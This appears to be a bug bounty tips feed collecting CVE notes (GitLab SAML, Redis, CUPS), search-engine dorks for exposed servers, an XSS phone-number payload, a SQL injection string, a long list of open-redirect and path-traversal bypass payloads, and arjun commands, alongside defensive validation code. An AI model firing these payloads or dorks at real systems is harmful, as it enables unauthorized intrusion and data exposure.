Bug bounty Tips
Cybersecurity enthusiast | Helping secure the digital world | Web App Tester | OSINT Specialist. Admin: @laazy_hack3r
Bug Bounty for Beginners
#infosec #cybersecurity #hacking #pentesting #security
*CVE-2024-45409 | Ruby-SAML Auth Bypass In GitLab*
_*What You'll Learn*_
1. *Overview | Description of CVE-2024-45409*
2. *Reconnaissance For CVE-2024-45409*
*Shodan.io*
*Censys.io*
*Fofa.info*
*Hunter.how*
*ZoomEYE.HK*
_<======================>_
3. *Exploit CVE-2024-45409 | GiveWP WordPress Plugin Exploit*
4. *Exploit Installation*
5. *Exploit Tool Guide*
6. *Impact*
7. *Severity*
8. *Remediation*
https://yashsec.com/bug-bounty/cve-2024-45409-auth-bypass-in-gitlab/
XSS in Phone Number Field?
Recently I re-watched the NahamCon2022EU: RTFR (Read The Bleeping RFC) by securinti
One thing I was surprised to find out was that phone number fields can be vulnerable to XSS.
How is that possible?
According to the RFC it is possible to append "optional parameters" to the number. Something like:
• 10203040;ext=+22
• 10203040;isub=12345
• 10203040;phone-context=example
This can lead to XSS if:
1. The library parses phone numbers according to the RFC and accepts optional parameters such as "phone-context"
2. The phone number is reflected on the web interface without input validation or output encoding
So payloads like "10203040;phone-context=<script>alert(1)</script>" CAN be a valid phone number and trigger XSS
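As an added defender-side example (not from the post), here is what the two conditions above look like in code: a permissive RFC 3966 style parser, a strict validator that checks each parameter against its grammar (a phone-context is a domain name or a global number, so it can never contain angle brackets), and output encoding for the reflection point. The regexes are a reduced version of the RFC grammar, assumed sufficient for the example.

```python
import html
import re

# Reduced RFC 3966 grammar (added example, not the post's code):
#   phone-context        = domainname / global-number-digits
#   global-number-digits = "+" DIGIT *( DIGIT / visual-separator )
#   local-number-digits  = *phonedigit-hex
_DOMAINNAME = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
                         r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$")
_GLOBAL_NUMBER = re.compile(r"^\+[0-9][0-9.()-]*$")
_LOCAL_NUMBER = re.compile(r"^[0-9A-Fa-f*#.()-]+$")
_UNRESERVED = re.compile(r"^[A-Za-z0-9._~+-]+$")  # conservative charset for ext/isub


def parse_tel(number: str) -> dict:
    """Permissive split into digits and ;key=value parameters, the way a
    library that honours RFC 3966 optional parameters sees the input."""
    digits, *raw_params = number.split(";")
    params = {}
    for item in raw_params:
        key, _, value = item.partition("=")
        params[key.strip().lower()] = value
    return {"digits": digits, "params": params}


def validate_tel(number: str) -> bool:
    """Strict validation: digits must be a local or global number and every
    parameter value must match its grammar. '<script>' is neither a domain
    name nor a global number, so the post's payload is rejected here."""
    parsed = parse_tel(number)
    digits = parsed["digits"]
    if not (_LOCAL_NUMBER.match(digits) or _GLOBAL_NUMBER.match(digits)):
        return False
    for key, value in parsed["params"].items():
        if key == "phone-context":
            if not (_DOMAINNAME.match(value) or _GLOBAL_NUMBER.match(value)):
                return False
        elif not _UNRESERVED.match(value):
            return False
    return True


def render(number: str) -> str:
    """Output encoding at the reflection point: even if validation is skipped,
    the escaped value cannot close the attribute or open a <script> element."""
    return '<input name="phone" value="%s">' % html.escape(number, quote=True)
```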
CVE-2024-31449 and others: Multiple vulnerabilities in Redis, 4.5 - 8.8 rating
Three fresh vulnerabilities allow an attacker to perform RCE due to errors in the Lua scripting engine or DoS via malformed Access Control List selectors.
Search at Netlas.io:
Link: https://nt.ls/1G7ul
Dork: protocol:redis
Vendor's advisory: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5
World's fastest unlimited single and bulk subdomain finder! Use desktop!
https://cyfare.net/apps/subfind/
Exploiting Visual Studio via dump files - CVE-2024-30052
https://ynwarcs.github.io/exploiting-vs-dump-files
Write-Up - Telegram Anonymous Chat Hack Bot: https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed?source=rss------bug_bounty-5
If you're into generating subdomains quickly,
check out this website: husseinphp.github.io/subdomain/
SQL Injection
CVE: 2024-36837
Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips
CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution
A remote unauthenticated attacker can silently replace existing printers' (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer).
PoC: https://github.com/RickdeJager/cupshax
This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network.
CUPS Report and POC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1
Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
Search Query:
HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"
P.S. 2.9M+ services are found on hunter.how yearly
Fuzzing from First Principles
https://zerodayengineering.com/research/slides/FuzzingFromFirstPrinciples.pdf
Finally working on this and I will be back, getting better and better, guys, so that I can help you guys understand how things really work...
You can try these effective manual open redirect bypasses:
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
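As an added defender-side example (not from the post), this is the kind of redirect-target check that refuses the variants listed above: it percent-decodes until stable (so double encoding cannot hide a leading `//`), folds backslashes the way browsers do, rejects control bytes, and then allows only a same-origin path or an http(s) URL whose host is on an allowlist. `ALLOWED_HOSTS` is a constructed allowlist for the example.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"app.example.com"}  # constructed allowlist (example only)


def canonicalize(target: str) -> str:
    """Percent-decode until the string stops changing (defeats %252f double
    encoding), then fold backslashes into slashes as browsers do."""
    prev, cur = None, target
    for _ in range(5):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")


def is_safe_redirect(target: str) -> bool:
    """Accept only a local path or an absolute http(s) URL to an allowlisted host.
    Everything else on the bypass list above falls into one of the rejects."""
    url = canonicalize(target).strip()
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in url):  # %00, CR, LF
        return False
    parts = urlsplit(url)
    if not parts.scheme and not parts.netloc:
        # Relative target: exactly one leading slash, so "//host" and "///host"
        # (which browsers read as protocol-relative) are refused.
        return url.startswith("/") and not url.startswith("//")
    if parts.scheme not in ("http", "https"):       # javascript:, ftp:, data:
        return False
    if "@" in parts.netloc:                          # userinfo trick: //a.com@b.com/
        return False
    # hostname is lower-cased and stripped of port and userinfo by urlsplit,
    # so case tricks, alternate ports and decimal/hex IPs all miss the allowlist.
    return (parts.hostname or "") in ALLOWED_HOSTS
```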
For finding hidden parameters:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"